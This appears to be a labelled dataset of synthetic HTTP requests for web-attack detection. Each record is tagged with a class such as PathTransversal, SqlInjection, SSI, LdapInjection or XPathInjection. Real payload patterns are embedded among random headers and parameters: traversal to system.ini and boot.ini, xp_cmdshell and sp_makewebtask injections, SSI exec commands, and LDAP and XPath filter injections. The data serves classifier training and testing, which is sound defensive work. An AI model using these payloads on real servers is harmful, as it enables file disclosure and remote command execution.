GET /z@YtilK0/tgo/cA/28pOf./oe5dml/spOsYQvCyL/lspg9ppds/JL96Q44e@6Yw5E/pSrOhXPZk/tZer.jpg?whwwbdj4h=ened%29%3Dg0naymha5&d4dc=6c9fJAztIYn&form5pJvmYs=%2Fst&nu1s=oaimHHL&stnrafdsJra=aesm9exece%2BSE&2.XGacceptcT=sTGsrju7pk&i8eaitda=d+Erd+&htot=yezqPPSP&eeu6sljna=..%2F..%2FUBData%2FMembers%2Fmembers.grp%2500&Secrsp=Taxterms&vsma=a6ttaptiaOThTs&nAiftpr=wt+&dwvittctIeoae=7616176&W6FjMu=%7Elikebns HTTP/1.0
Host: www.shoc.org:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1252;q=0.4, us-ascii;q=0.9, gb2312;q=0.7, utf-7;q=0.1, x-mac-arabic;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=96016
Client-ip: 3.199.126.43
Cookie: fotThYlbs=o9otySnW;sexrBwjtOciN=childitdyF;inhxmara=Tota;e4ElpaRn=90492
Cookie2: $Version="755"
Date: Tue, 14 Jun 05 11:56:21 UTC
ETag: W/"iAvTuF5KGkZrim_RXUs"
Expect: olpham=dewefu
From: idto@ug5qpuenx6.org
If-Modified-Since: Sat, 19 Jan 08 16:02:52 UTC
If-Unmodified-Since: Sat, 12 Sep 09 18:10:48 UTC
If-Match: *
If-None-Match: "1z7E2N9Lg@uLveYI"
If-Range: Thu, 03 Jul 08 10:20:20 CET
Max-Forwards: 5
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest response="cFbf2F57cDDF4E7Ed19bE92BCEa0ec12"
Authorization: tAfia oedt1sg=zjNw6eeh
Range: 032407-30
Referer: /7tEt5pak/eaue8/s7nie.bin
TE: deflate
Trailer: Referer
User-Agent: Mozilla/4.3 (Windows; U; Win98 8.4; ib-he; rv:4.3.6) Gecko/53804847
UA-CPU: StrongARM
UA-Disp: 8355,9239,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 2762x370
Via: HTTP/3.9 5.50.89.38
Transfer-Encoding: compress
Upgrade: nhT/6.7
Warning: 151 7.22.89.225 "tqonsaseaLehs" "Fri, 02 Feb 07 23:07:17 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44943
Start - Id: 45643
class: PathTransversal
GET /7ha/Kr/negaro0saimren0Sra/o0/O9Hw/ea5eNoimlsQrte/snZFdvog-H2qit2E/6bx7.asmx?orn=2_Hpr&Etssae=lttchildkhme%40j-joeptrVa%26&fhG=dBDL&rlPwSleIeltmh=rXg&.ZJ@Phtpass=7071&ubi2s=appwva7rm&edkyqe=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&4ePJPx=xiDlen&elt6Tglure4gion=e%27o%26ickm1Isen%3EdscripttE&tvWtwrQnd3abD=74&is2t=lib%3Bsamtncfromhposition%28+i%3ELcbwhewp- HTTP/1.1
Host: www.hmihsii.org
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-3;q=0.3, koi8-r, euc-kr
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=31550
Client-ip: 168.189.41.184
Cookie: E_Z@M3OXol=3343;hrl1erunlpryl=3t1digyutetetonen;JRJimgbChS=25504;3soivleeawlioo=veoEw
Cookie2: $Version="85"
Date: Sat, 11 Jul 09 02:34:49 GMT
ETag: W/"uiNwMQd.pGn0zWNudmL"
Expect: 8tgi=set7eote;8iscgtm
From: f6eo@ixbm.net
If-Modified-Since: Fri, 21 Sep 07 01:59:08 UTC
If-Unmodified-Since: Tue, 09 Oct 07 13:54:33 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 26 Dec 08 15:47:27 GMT
Max-Forwards: 4
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: NTLM b2FhZG5ubmVzZTgwd1BHb2V0c2NpZXNiT2VtZXJhYXJvZXRuZnJhbWNhbw==
Authorization: eorEfg ittSh=d8tksla
Range: -5753
Referer: /trlOtb/rof1/8enssh/xfEaiiWW.zip
TE: trailers,gzip
Trailer: Upgrade
User-Agent: nniatpHowrAhib
UA-CPU: Sparc
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 822x7787
Via: FTP/6.5 215.46.70.8
Transfer-Encoding: identity
Upgrade: 8mc5/8.9
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 6406326694
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45643
Start - Id: 45769
class: PathTransversal
GET /eguzhmwIneN5/tYP/tdvcJRBm.ypRL0/us/deleteine@Ct7GL4LUvX/depeonirR7kneecla/4bnremehshi1te/dc9eipm/A_Uwgetj3@-NGbumDL/ud.js?cdehl=12011132&O7mnnddsraiiovt=rohshEeaiq&tuaa1ovttnft0Gg=nonvnar%5DnesiI+n%2B-%3Cexec&dh=l+&les8O8b=78049&TrK0group by=rasEMh&s2DSAMehttpK6=hTfT2w1QI1v&TOa=Ona+axp_e&inBWE=%7CelgziZP%3BEsohi%7Eac7g&nvdlpAUne2cnr=itrme94Hp8ainxr&keiis9ntoemeew=c8rmc+zznske%28Na+ElJt&ail=nrnyt&omsnhouebatl=shhqd&16=29&onhnj1ksnor=p%3A%5Cwindows%5Cboot.ini HTTP/1.0
Host: 44.108.184.194
Connection: keep-alive
Accept: audio/*, text/html;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=142
Client-ip: 229.242.26.88
Cookie: iTiabtrmh=sw3yrD;turh9rincludes;nhssle=hwioalili
Cookie2: $Version="51"
Date: Sat, 15 Apr 06 09:10:54 GMT
ETag: "o-Sve-wo4yNnUq.x7"
Expect: 100-continue
From: dsxeHs@whobloehb.be
If-Modified-Since: Mon, 29 Aug 05 14:04:01 UTC
If-Unmodified-Since: Tue, 09 Nov 04 15:10:39 CET
If-Match: "BMsax5dEFmjAEaLy0"
If-None-Match: *
If-Range: "9ARq7ETJZu3GDsc"
Max-Forwards: 308
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: nE0np rioae=tsisa
Authorization: Ores eEtpwyE4=Eninloeo
Range: -500252,934-3694
Referer: http://jlmne.org/e9n2R.wav
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: emKSwW http://www.lniNo.com
UA-CPU: 68000
UA-Disp: 4288,202,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9810x7556
Via: HTTP/7.5 32.50.150.25:911
Transfer-Encoding: gzip
Upgrade: pvn3h/3.4, legdk6/8.9, d1wenn/6.0
Warning: 366 www.qjwrkE.jpg:272 "oMcna8llngods" 
X-Forwarded-For: 46.216.57.172
X-Serial-Number: 5959177395
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45769
Start - Id: 41072
class: SqlInjection
GET /ewumre/ePqygHb769X5Uq/n_1/1honi7/9eEautoexecOZW/hVGBAPpjfzjv0/LC6oN@8/831GE.mspx?whbKsp=8689&zhlsaret5Aeeo=eCU%406ShbZb&ewmiTaogaEitOn=ltohanb&JvIchR-=hpasswd2iaccept&Asr_pWLx=ipylKA&2ivI443Kq5P=3nxdenynNlHgsIeauo&eqleph3iiRl7err=%27%3B+++++EXEC++master.dbo.sp_makewebtask+%27c%3A%5Cinetpub%5Cwwwroot%5CiRe.html%27%2C++%27SELECT+++nntl9mo++FROM+tnl6bn+++WHERE+++++xtype%3D%27%27U%27%27%27&corigeesedms=noleo HTTP/1.0
Host: www.wlxat.ch:21926
Connection: 4nieedh
Accept: video/quicktime;q=0.3
Accept-Charset: x-mac-chinesesimp, euc-kr
Accept-Encoding: deflate;q=0.2
Accept-Language: *
Cache-Control: no-store
Client-ip: 26.111.242.56
Cookie: ddtr3naop=4964391060;m2=28;t3gt47esy=wanOdtrsRdauy
Cookie2: $Version="049"
Date: Fri, 18 Feb 05 17:39:52 CET
ETag: "dAZmn_EU_5mYota"
Expect: 100-continue
From: ttytsmgz@lbtfnlH.de
If-Modified-Since: Mon, 04 Apr 05 19:41:15 UTC
If-Unmodified-Since: Wed, 25 Jun 08 22:46:54 UTC
If-Match: "pwn5gxFi5EmwbP7"
If-None-Match: "I4lVIwmicZ_0VNzd"
If-Range: "jH.HSSGdokJL@Wxsx"
Max-Forwards: 32
MIME-Version: 1.5
Pragma: aAhy='lthsed'
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: NTLM bWVzRGVua2F3c2xpYXNobm5obWFueU9hN3lwdHRsaWN0dA==
Range: 253-,679517-254
Referer: /9rael.aspx
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.4 (Windows; U; Win98 4.0; Il-at; rv:4.7.0) Gecko/06067788
UA-CPU: 68000
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 868x437
Via: 0.6 20.224.201.145, Iueh9/2.0 254.139.242.187, 0.6 41.73.177.232
Transfer-Encoding: identity
Upgrade: t1er/5.7
Warning: 764 76.214.33.91 "Rbeodtq" "Fri, 19 Mar 04 18:10:47 GMT"
X-Forwarded-For: 32.32.219.84
X-Serial-Number: 54708069609443708
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41072
Start - Id: 40902
class: SSI
GET /MC7nullEObD/UAZMJAE_8ZD2HmP/i1sqx95yHTnI_jVg2/M4/wxmlWoptalog/ltHsieesattoitaoc/qrnlcDethN/tzoauiertocstsjn/toRGUsJ1vWUfiq.shtml?mEtdaEeldonilec=7968996016&dm5itgbnhsnEdos=%3B%24connectntaa0%28&acesz9grcoau=%3C%21--++++%23odbc++++statement+++%3D++++%22select+fEerI%2C+++++oecu%2C+++pm+++from++i0ot+++++order++by+++++8%2C++49%2C+++7%22+++++--%3E&dq=rop+e&daesc2iOaihTy=nff8v%3Ese5tsbinort&jf=Meurr&imgGl_=59fc HTTP/1.0
Host: 37.89.240.155
Connection: close
Accept: text/*
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.6, compress;q=0.0
Accept-Language: xhmeV-7;q=0.2, iDh-imude, ryansnn-daiEl;q=0.2, yasie-ae
Cache-Control: no-store
Client-ip: 215.13.110.135
Cookie: fgaevnunbel=pwxd-LPi9;av8eOfyh=copyrnhhdtNeal1l;drtmeqTrcDn=uti8pb7a;5atudnrt=ihnisoliba;syE=)me
Cookie2: $Version="664"
Date: Tue, 19 Aug 08 17:46:25 UTC
ETag: W/"Hbi9FlqOqi2IBOOJ0"
Expect: 100-continue
From: ditrnsd@mzoyfsuain.uk
If-Modified-Since: Thu, 15 Nov 07 13:38:18 CET
If-Unmodified-Since: Tue, 25 Jan 05 12:54:31 UTC
If-Match: "JFFjtQ3dMZUbi3yyi"
If-None-Match: *
If-Range: Sun, 02 Sep 07 11:22:26 GMT
Max-Forwards: 893
MIME-Version: 1.9
Pragma: nlbryty='6Oba2rc'
Proxy-Authorization: NTLM b3Bpc295VHpvc2syNGxlZkV3aGlhbmVuZTVlYmh0b3RzenI=
Authorization: Basic Zk9BaGk6dGVSYWM0c3Q=
Range: 776-,-33080
Referer: http://www.qxtmwte.it/etb3/eo4nut/oetf/eyheoum.pl
TE: chunked;q=0.6,deflate;q=0.5
Trailer: Expect
User-Agent: Mozilla/6.6 (X11; U; Open BSD i386 5.8; et-iw; rv:8.4.0) Gecko/86138449
UA-CPU: StrongARM
UA-Disp: 8926,1457,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 206x873
Via: HTTP/6.6 100.7.237.22:880
Transfer-Encoding: identity
Upgrade: fmoaA/7.1, wyse3a/5.5, tlee/2.8, eejrdw/0.2
Warning: 603 www.e2tt.jpg:323 "reecdaeesselriRoe" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 821981271525659
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40902
Start - Id: 45303
class: PathTransversal
GET /ohEDiW79evf_jnkT6H/ppnFf.Tw/imeK.nsf? HTTP/1.0
Host: www.evteRo3.de
Connection: grnn
Accept: text/xml;q=0.0
Accept-Charset: *
Accept-Encoding: \WINDOWS\system.ini
Accept-Language: *
Cache-Control: max-stale=73780
Cookie: Ehee=2849387;cv=0SN9XGIw2Z;iggrit=7eo;3cirolO4ziyPe=854
Date: Wed, 21 Jan 09 22:56:59 GMT
ETag: "BUk8NvAlThDuQVHd"
Expect: htgie
From: tlom@3TtCeayl.be
If-Modified-Since: Sat, 21 Oct 06 02:41:07 UTC
If-Unmodified-Since: Sun, 28 Jun 09 20:16:56 CET
If-Match: "EinjldyMigy3071"
If-Range: Wed, 28 Jun 06 11:51:26 CET
Max-Forwards: 3414
Pragma: t6e=srasaih
Authorization: Digest nonce
Referer: http://www.aTi4vt.biz/ofmno/6oete6r/Auielse/rDha.js
User-Agent: Mozilla/6.0 (X11; U; Unix 6.5; em-me; rv:4.5.5) Gecko/31259760
UA-Pixels: 1224x778
Upgrade: hbyi/9.8, oau8e/8.0, oroaiL/0.1, uq9dqe/3.1, ckig/4.9
Warning: 059 www.lgeo8e.gif "4Lhn" "Sat, 27 Aug 05 22:33:11 UTC"
X-Serial-Number: 67316916760
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45303
Start - Id: 40344
class: SSI
GET /8s8.cgi?EzrP1YuW=pcn3isqi1&reEui1hrvieV=oa&7od=xmloptOo&Yv3RRY=81&Ose=0995339&eel=l+pseMtsgasi&utb6atswri7=ul&twhere9M7gQX8Xwget=79&9mshr=%3C%21--%23exec++++cmd%3D%22c%3A%5Cprogra%7E1%5Cdr32dhiaqy%5CnUgtd%5Clhbtg.exe+++++d%3A%5Cw2n%5Cwww.rimaitre.org%5CaNc1plouy%5Cdatabase.mdb+%2Fx+++exporttofoxpro%22--%3E&4teutRg=437999521&lvselectGX4@SexecYF=ekf&qe2o=na82&gEdnnwd=04909352&rle3mLo=tk1YPQr3af&K4Dvwinnt=ermpdraita+ HTTP/1.1
Host: 25.79.40.31
Connection: iriz
Accept: */*
Accept-Language: *;q=0.5
Date: Mon, 24 Mar 08 06:44:42 UTC
If-Modified-Since: Sun, 07 Mar 10 13:47:35 CET
If-Match: *
Authorization: Basic aWZhRURpZE06cHltdWFzbWU=
Referer: /Intmr/dser.gif
User-Agent: hjqia2CM6n http://www.sfrsoh.fr
UA-OS: Linux
X-Forwarded-For: 112.242.208.185

null

End - Id: 40344
Start - Id: 36148
class: PathTransversal
GET /ryAog7EDEf/vpe/0SEaJAr75Cu4DZ@/reaShZaeei/cVG._FUL/h5gXOXAg/urc@UKF-fs6R/hogpcWjgf/4y_wnA.SE/nrvthRy/eh.asp?2y=Asi1Tthcecdaud&mcmeaxd=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fieetve%2Fme%2Fenicntiset%2Fst.php HTTP/1.1
Host: 189.109.74.119
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: 7-bsyibtUu, ciA-n;q=0.4, otnM8Hbh-ie, e-etnfle
Cache-Control: no-store
Client-ip: 52.138.136.254
Cookie: rqosnhho3d0me=etl;hiTqmalnt=e5so;rmandd=\'lefnisyn;ioS52lbtr=1;uqWdn=fAlnde4hfoasln0;link-7kCeall=sR3zedoiTTad9
Cookie2: $Version="9"
Date: Sun, 20 Sep 09 04:59:22 UTC
ETag: W/"ns9fmDOQwg1@j3lH"
Expect: aOm3A
From: aitunw@tegatgpn.uk
If-Modified-Since: Mon, 27 Sep 04 09:03:08 GMT
If-Unmodified-Since: Sun, 26 Dec 04 09:23:09 UTC
If-Match: "VcIuyd-IlaxkYrScP"
If-None-Match: "K43o6XIECWMNYSC"
If-Range: Fri, 26 Oct 07 21:16:20 UTC
Max-Forwards: 587
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: NTLM bWNoOHN4ZWh1bElpZWRrcmVsTWN0d2hpb2FiYXJldG92dWV1bnVvaQ==
Range: 375-
Referer: /whniaddi/Rreeli/nonO.wmn
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/2.2 (Windows; U; Win98 7.4; wa-6r; rv:0.0.8) Gecko/35262942
UA-CPU: MIPS
UA-Disp: 4342,924,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 795x647
Via: zwgt/5.7 18.79.7.7, eels/1.1 www.lptn5qe.js
Transfer-Encoding: gzip
Upgrade: bhte/9.7, rertro/9.5
Warning: 851 141.46.27.130 "hnaniEfhYuniiebi" 
X-Forwarded-For: 27.217.111.45
X-Serial-Number: 6486734154619358
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36148
Start - Id: 41087
class: SqlInjection
GET /zbrigsn/ija11x5GM0OZVk2Z/kvVm3OcjkvW/re2r4seL4hateOitce/5urydoyycs3sTttz/qetrp1itra.php?bbneceu=ssyBfpGnCa&Eieo9dtaariziI=oaitle&etf05l=seeieay6m8w6s&iobisHErWwrNipb=n3reasW8telS&6mCObsam3kpOU=eAfpJ&sEi6Wlt8enob=%27%3BEXECmaster.dbo.xp_cmdshell%27cmd.exe&E0TRTnE=npwt&Oe6raukmUi=23545&asi7heuE4tOdb8a=jqUHnIPy0J%40 HTTP/1.1
Host: www.ebiiklohea.de:4893
Connection: 0xise
Accept: video/mpeg;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 3-sg3eiiEe;q=0.7, nT-Vhanceh, HlmH-t;q=0.7, o1-tsdrc;q=0.8, aebsc-aDh8If;q=0.6
Cache-Control: only-if-cached
Client-ip: 183.139.157.162
Cookie: i8i=nnsoror$%document]hB;2tt5=uf8I;@C8Q=mrl.NzzK;9D4positionpEU=dTGtK_;a6h=2080;53betweenunullqIwindow.open=4698369279
Cookie2: $Version="624"
Date: Wed, 19 Apr 06 10:00:51 CET
ETag: W/"pNa_WXpEGDiRA7WpPUNe"
Expect: todx=mj6wd7;rmdo
From: mhst@6auiinb.st
If-Modified-Since: Sun, 21 Dec 08 07:19:48 UTC
If-Unmodified-Since: Sun, 04 Jan 04 17:28:18 CET
If-Match: "5QIg1LBKZrJufY8Zbegw"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 7.6
Pragma: stxR2zt=afm
Proxy-Authorization: Digest username="seeg"
Authorization: nedle 4l5o=4osg
Range: 1-877
Referer: /paedyoo1/6w5ito.sh
TE: chunked;q=0.7,deflate,gzip;q=0.7
Trailer: From
User-Agent: Mozilla/8.5 (Machintosh; U; Mac OS X 1.6; tb-ae; rv:9.2.0) Gecko/97418376
UA-CPU: StrongARM
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 194x0684
Via: HTTP/9.5 www.lsey.js, HTTP/6.7 137.59.172.118:482
Transfer-Encoding: identity
Upgrade: Nb5/4.4, 2oss/0.9, ienmha/5.2, paie/0.1, sMat/4.9
Warning: 451 198.72.245.237:3639 "gyrmlem" 
X-Forwarded-For: 110.167.165.101
X-Serial-Number: 54708069609443708
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41087
Start - Id: 38938
class: LdapInjection
GET /c.rnre5oK8Vselect/av.2jtmljDIzv..Xfi.asmx?aTMlbe=%29+%28++++%7C++++%28+++cn%3D*o+%27brien*++++%29%28mail+++%3D*o++++%27brien*%29&terEsb0eosh=9167&ob80as=AnJ%3AR&Bxnullr=e_LY0qekDl1C&vhAnnsr=iL HTTP/1.0
Host: www.edfe.fr
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: windows-1257
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 53.164.177.129
Cookie: @U9rIGot.TZH=t&;gMHNebolr=gbzhU;bhbnm=lvee1e2mhzfst$i;henaE7qlw=05030;tevgaZwfrihua=esupdate;cZ.Er6httpsgFprocessing-instruction=eoawget6psOhseuniont%vbscriptnu>|
Cookie2: $Version="0"
Date: Sat, 26 Jun 04 13:04:41 UTC
ETag: W/"ZzhSlCITX6NTS9bN"
Expect: 100-continue
From: merdf@ssdhtag.cz
If-Modified-Since: Tue, 09 Feb 10 14:40:03 UTC
If-Unmodified-Since: Mon, 29 May 06 03:43:52 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 163
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM NGloNUVlOER0YWFvb2dlMHRBZnZuR3RlczZodDJkaWVoc0Ruc2I=
Authorization: NTLM YWRXdWhib2V5YXRlc0FwZWllcDZvc0oybnRuQWFBNHJybg==
Range: 19115-,-68,486-99
Referer: /2nsa/ethb8ff/azdIigh/dteh/cf2ytNb.tar.gz
TE: chunked;q=0.4,trailers
Trailer: From
User-Agent: Mozilla/1.4 (X11; U; Unix 1.9; dm-zt; rv:6.2.7) Gecko/04436811
UA-CPU: 68000
UA-Disp: 8172,5109,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 425x879
Via: 0.8 89.150.107.5:36670
Transfer-Encoding: treihe; ttti0=ddIrm
Upgrade: nocAo/1.3, tgd/7.3, c3isen/9.2, BaeeL/8.6
Warning: 490 107.236.240.80 "Ol4tn7eejtras" "Mon, 14 Jun 04 07:29:54 UTC"
X-Forwarded-For: 212.86.228.108
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38938
Start - Id: 35603
class: XPathInjection
GET /.kU/nnnisaeihityr/cfconnect3ZaM/nymLEtrso8taur/q92s.ELZGu9Oz.MRCddA.bin?boAnnuatnutbt=eumO%27++++or++1%3C+++++n%2Frsrumo%2Ftbu1u%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D5%5D+or+%27tnbms%27%3D+++%27 HTTP/1.1
Host: www.jiss.com
Connection: n9sn9a
Accept: */*;q=0.0
Accept-Charset: iso-2022-kr, windows-1254;q=0.7, windows-1251;q=0.0
Accept-Encoding: deflate;q=0.8, deflate, deflate, identity;q=0.4
Accept-Language: 0nzcev-wdn, xde-cocey, t4s-nsu2h, 8ssTre-uDpI
Cache-Control: no-cache
Client-ip: 132.226.188.115
Cookie: jin5TCJIN5pp=zph;zUar6vco=4nE;d7bscadajeesp=llthIoe;F144X=y5stdinca~ecd;n@bKTW=n4x
Cookie2: $Version="6"
Date: Sat, 18 Apr 09 11:49:58 CET
ETag: W/"tF5Sw0AaliY@Erh7FZ"
Expect: 100-continue
From: hsgss@kOcgeesht.ch
If-Modified-Since: Sun, 28 Oct 07 03:42:36 UTC
If-Unmodified-Since: Fri, 05 Feb 10 24:23:56 UTC
If-Match: "KZsHIbB1xmPO2og889_"
If-None-Match: *
If-Range: "EqszOohtJcbcnkQhD"
Max-Forwards: 5357
MIME-Version: 4.7
Pragma: o=nq1rfn
Proxy-Authorization: eNmRc aseer=gr3Gfc90
Authorization: Basic c3BoZGVpbDpubGlvaHNp
Range: 1278-6
Referer: /Aaayh/liiindw/zmrani.pl
TE: chunked,trailers,gzip
Trailer: Host
User-Agent: Mozilla/1.5 (X11; U; Unix 1.9; au-0o; rv:4.2.8) Gecko/65509106
UA-CPU: x86
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 138x439
Via: 4.4 www.erlu.jpeg, 0.3 99.180.156.149
Transfer-Encoding: compress
Upgrade: eto3T/9.1, 9rfo3l/2.2, nuUaek/3.0
Warning: 189 www.shodin.tiff:54 "hwauAetaeeeSes4" "Tue, 24 Mar 09 21:44:06 CET"
X-Forwarded-For: 168.99.224.77
X-Serial-Number: 65275952070459353
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35603
Start - Id: 40477
class: SSI
GET /Uso/v7bstat/Kceeek/lEVYpe6f@RGdWNGa/xbz/ftha5pnNfitsqrteaa1R.bin?en58rtet=33703&alTeec=4131&1ssoyhwyee=nelnedtqpoi&TxX94eV=laea%24t&2orOwoNmresy=516890781&ho=0541436849&LfromuHRAD.x=%3Aee8&0q1S=619&Das3edIR=ndestt%5CrhSolt&HwEd-1J7m=oht2&38xj0Lp-H=TLintiojts7iktaa&Sea=%3C%21--+%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++--%3E&umnj96ld=ly7&Oai1wkaaNhiss=sG3Q5grjv1&qsImt=458308 HTTP/1.1
Host: 99.37.248.49
Connection: aseozo
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: par4u5ih-thtedis;q=0.6, jtsdszf-dEzr;q=0.6
Cache-Control: no-transform
Client-ip: 207.160.226.22
Cookie: 7poRla56si=88277634
Cookie2: $Version="386"
Date: Mon, 07 Jun 04 02:16:05 UTC
ETag: W/"FGqTlYRcSn07Vq9zDb"
Expect: 100-continue
From: esoefoms@tnncodier.cz
If-Modified-Since: Wed, 23 Sep 09 23:56:41 GMT
If-Unmodified-Since: Mon, 25 Apr 05 21:29:03 CET
If-Match: *
If-None-Match: "9FKU8u_.GqW6Spnj"
If-Range: *
Max-Forwards: 4
MIME-Version: 6.5
Pragma: N=5exvoren
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: NTLM ZWV0c2VodGNubnR0dG5lZGRidGdyY2Vtbm51ano4Y2VoQWRTTG1kZnVVOG1rZXk=
Range: 6740-758,0802-
Referer: http://hmotywae.com/Raedo.tar.gz
TE: trailers,deflate;q=0.0,trailers
Trailer: Host
User-Agent: Mozilla/9.1 (Machintosh; U; PPC 8.4; ro-ne; rv:1.8.4) Gecko/78675957
UA-CPU: PowerPC
UA-Disp: 193,8331,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 7701x851
Via: 7.7 120.165.158.146, 0.3 www.ots2g.js, uhhihe/4.2 www.ngtquefi.css:2
Transfer-Encoding: deflate
Upgrade: Fgc8t/0.2
Warning: 565 www.mo1i.jpg "difinztedvtd" 
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 98565372421828
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40477
Start - Id: 38883
class: LdapInjection
GET /CUyzoptPiYMJZd/sVyYll/yuswq.cO.gif?9uuDbT8dj=71%29%28%26%28objectClass%3Dda4e%29%28%7C%28sn+%3D++qE%29%28cn%3DlL++J*%29%29 HTTP/1.0
Host: www.fpcsut.org
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: hiDoi-aho1u;q=0.4, yoseta6l-natte;q=0.9, h6-snaa3fpn
Cache-Control: min-fresh=9
Client-ip: 185.212.239.81
Cookie: Yeferunltms=5683260627;-dHajFk9a=seerhtpassr8OOic1a o;emhwfosa4tSs=o-i;hlUn4=1987912;_Weid0zvKN=goSo|nb1oee;aetyt0efh9os=zcA
Cookie2: $Version="1"
Date: Mon, 14 Mar 05 20:18:36 GMT
ETag: W/"GQYvF59TeQfbrP-gc"
Expect: onveaEc=boIat;tlR2=6o2r
From: w08rh3@rpehekeyi.com
If-Modified-Since: Sat, 05 May 07 11:25:13 CET
If-Unmodified-Since: Sat, 30 Oct 04 20:09:49 GMT
If-Match: "siNsMaLAzu7sXwI"
If-None-Match: *
If-Range: Sun, 16 Jul 06 22:15:01 UTC
Max-Forwards: 8268
MIME-Version: 2.4
Pragma: avqey=srneu
Proxy-Authorization: NTLM MnQzaW9iYWF0aHNsUnRjYzBudGlpa0FvVWVjZWE3ZWlwNGVsaHNpYWZpc3BoZWE=
Authorization: 47utnf uidxfp=i1zvrAom
Range: 15934-,799-8058,-81465
Referer: http://www.Fgetsgid.uk/Tp5rns/gnlods.aspx
TE: chunked;q=0.9
Trailer: Transfer-Encoding
User-Agent: Rjxfolt/8.7.0.2
UA-CPU: x86
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 297x7324
Via: 5.4 www.afeah.tiff:05, FTP/8.6 www.enHl6cv.gif:90782
Transfer-Encoding: etors; akatC=LOyruhn6
Upgrade: p9rld/0.9, tneW2/8.4
Warning: 654 173.160.4.85 "Ioao" 
X-Forwarded-For: 179.200.182.228
X-Serial-Number: 9521103915785136495
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38883
Start - Id: 45355
class: PathTransversal
PUT /rDF2Wm/6OlZQxpL.mdb? HTTP/1.0
Content-Length: 255
Content-Language: or1gMua,sTeao,sdaeas
Content-Encoding: deflate
Content-Location: http://www.Qeel.gov/Ewoodsdl/teGadzaa/eepetsr.dll
Content-MD5: c2JoZTFlZU41Y2hiaElpaA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 15 Aug 09 23:51:11 UTC
Host: 138.205.85.105
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 195.135.237.8
Cookie2: $Version="3"
Date: Sun, 18 Oct 09 24:54:38 GMT
ETag: "5FKhCbL9g@J-mEhNi3sB"
If-Modified-Since: Wed, 16 Dec 09 10:23:14 UTC
If-Unmodified-Since: Thu, 18 Feb 10 05:46:32 UTC
